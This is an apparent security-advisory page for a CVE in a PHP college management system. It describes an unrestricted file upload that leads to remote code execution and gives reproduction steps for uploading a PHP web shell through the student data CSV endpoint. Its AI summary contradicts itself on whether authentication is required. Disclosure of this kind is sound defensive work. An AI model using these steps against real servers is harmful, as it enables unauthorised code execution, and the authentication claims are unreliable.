VYPR
← All advisories
Medium severity6.3NVD Advisory· Published Jun 5, 2026· Updated Jun 5, 2026

CVE-2026-11333

CVE-2026-11333

Description

Unrestricted file upload vulnerability in CollegeManagementSystem allows remote code execution by uploading a crafted PHP file.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Unrestricted file upload vulnerability in CollegeManagementSystem allows remote code execution by uploading a crafted PHP file.

Vulnerability

A security vulnerability exists in the Student Data Upload Endpoint of tittuvarghese CollegeManagementSystem, specifically within dashboard_page/forms/upload_student_data.php. The component performs a superficial MIME-type check that relies on the client-supplied Content-Type header, allowing an attacker to bypass it. The file extension is also taken directly from the user-supplied filename without validation. The project uses a rolling release model, so specific affected and updated versions are not detailed.

Exploitation

An attacker can exploit this vulnerability remotely without authentication. The attacker needs to craft a PHP payload and submit a multipart POST request to upload_student_data.php. The request should include the necessary student data parameters and the PHP file in the Student-Data-CSV field, with the Content-Type header set to application/csv and the filename appended with .php (e.g., shell.php). Although the server may return a CSV format error, the file will be stored on disk.

Impact

Successful exploitation allows an attacker to achieve remote code execution (RCE) by uploading a web shell. The server stores the uploaded file in the web-accessible dashboard_page/forms/uploads/ directory under a predictable filename derived from other form fields. The attacker can then access this file directly via a URL to execute arbitrary PHP code on the server.

Mitigation

This vulnerability has been publicly disclosed, and the project was informed early via an issue report but has not yet responded. As the project uses a rolling release model and version details are unavailable, a specific patched version is not identified. No workarounds or EOL status are mentioned in the available references. The project has not yet released a fix or responded to the vulnerability report [1], [2].

References
  1. Unrestricted File Upload Leading to Remote Code Execution (RCE) via Student Data CSV Upload (`upload_student_data.php`)
  2. GitHub - tittuvarghese/CollegeManagementSystem: Fully functional college and student management system for engineering colleges.

AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The student data upload endpoint performs a superficial MIME-type check that relies entirely on the client-supplied Content-Type header and does not validate the file extension."

Attack vector

An attacker can remotely exploit this vulnerability by crafting a malicious PHP file and uploading it via the Student Data CSV upload endpoint. The attacker must set the Content-Type header to 'application/csv' and append '.php' to the filename. The server will then store the file in the web-accessible 'uploads/' directory, allowing the attacker to execute arbitrary PHP code by accessing the uploaded file directly. [ref_id=1]

Affected code

The vulnerability resides in the `upload_student_data.php` file, specifically within lines 21-33. The code snippet shows that the file type check is `($_FILES["Student-Data-CSV"]["type"] == "application/csv")`, which is easily bypassable. Additionally, the filename is constructed using `PATHINFO_EXTENSION` directly from user input, without any sanitization or whitelisting. [ref_id=1]

What the fix does

The advisory does not specify any patches or remediation steps. The project has been informed of the vulnerability but has not yet responded. Therefore, no fix is currently available.

Preconditions

  • authThe attacker needs to have 'PR:L' privileges, meaning they require lower-level privileges to access the upload functionality.
  • networkThe attack can be launched remotely (AV:N).

Reproduction

Craft a PHP payload (e.g., <?php echo md5('123456789'); ?>). Submit a multipart POST request to upload_student_data.php with: The student data parameters (Department, Program, Course, Batch, Year of Admission). The Student-Data-CSV file field set to the PHP file, with Content-Type: application/csv and filename=shell.php. The server responds with a CSV format error message, but the file is stored on disk. Calculate the saved filename: {Program}{Department}{Course}{Batch}{YOA}.php (e.g., XXYYZZBB2011.php). Access http://127.0.0.1:3000/dashboard_page/forms/uploads/XXYYZZBB2011.php. The PHP code is executed, and the output (e.g., 25f9e794323b453885f5181f1b624d0b) is returned. [ref_id=1]

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.